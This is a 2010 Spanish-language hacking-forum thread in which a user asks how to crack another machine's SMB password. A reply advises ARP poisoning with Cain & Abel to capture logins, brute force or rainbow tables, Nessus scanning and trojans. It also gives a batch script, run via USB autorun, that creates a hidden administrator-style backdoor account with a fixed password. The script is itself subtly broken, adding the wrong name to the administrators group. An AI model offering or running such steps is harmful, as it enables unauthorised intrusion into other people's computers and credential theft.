Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Seguridad => Mensaje iniciado por: tordek en 24 Septiembre 2010, 04:21 AM

Título: Ayuda con el protocolo smb
Publicado por: tordek en 24 Septiembre 2010, 04:21 AM
buenas solo keria saber si hay alguna forma de crackear esta contraseña, he investigado y dicen que se puede con cain y abel, algun programa de fuerza bruta,etc.
porfa denme su opinion cual seria la forma mas eficaz de obtener esta contraseña?
de antemano gracias por sus respuestas
Título: Re: Ayuda con el protocolo smb
Publicado por: APOKLIPTICO en 25 Septiembre 2010, 17:58 PM
Lo que podés hacer es con cain & abel hacer arp poisoning y sniffar el tráfico buscando a alguien que se esté conectando al smb, una vez que se haya conectado, lo podés intentar crackear usando fuerza bruta, diccionarios o rainbow tables.
Título: Re: Ayuda con el protocolo smb
Publicado por: tordek en 25 Septiembre 2010, 23:29 PM
no se puede algun exploit o algo por el estilo  :P sino voy a tener que quedarme con cain y abel  :D
gracias
Título: Re: Ayuda con el protocolo smb
Publicado por: APOKLIPTICO en 25 Septiembre 2010, 23:45 PM
Y... Podés tratar con nessus, hacé un escaneo y fijate si encontrás algo... Supongo que debes de tener acceso físico a esta computadora ya que estas en una lan (a menos obviamente q estés en una vpn, en cuyo caso no va a funcionar el método con cain y abel), si tenés acceso físico a esta pc, podés dejarla vulnerable con muchas cosas, desde un troyano, hasta un script que agregue un usuario con un nombre de usuario y una contraseña.
No lo probé, pero debería funcionar:
Este script agrega un usuario llamado "sys" con la contraseña "elhacker", lo agrega al grupo de administradores y luego edita una clave en el registro para ocultarlo de la pantalla de bienvenida, luego, evita que expire la contraseña.

Código (dos) [Seleccionar]

ECHO OFF
CLS
net user sys elhacker /add
net localgroup administradores elhacker /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sys /t REG_DWORD /d 0
wmic path win32_useraccount where name='sys' set passwordexpires=false


Eso lo metés en un pendrive, luego modificas el autorun.inf para que se ejecute automáticamente y listo...
Lo único q tenes que hacer, es cuando esté prendida esta pc, enchufas el pendrive y listo.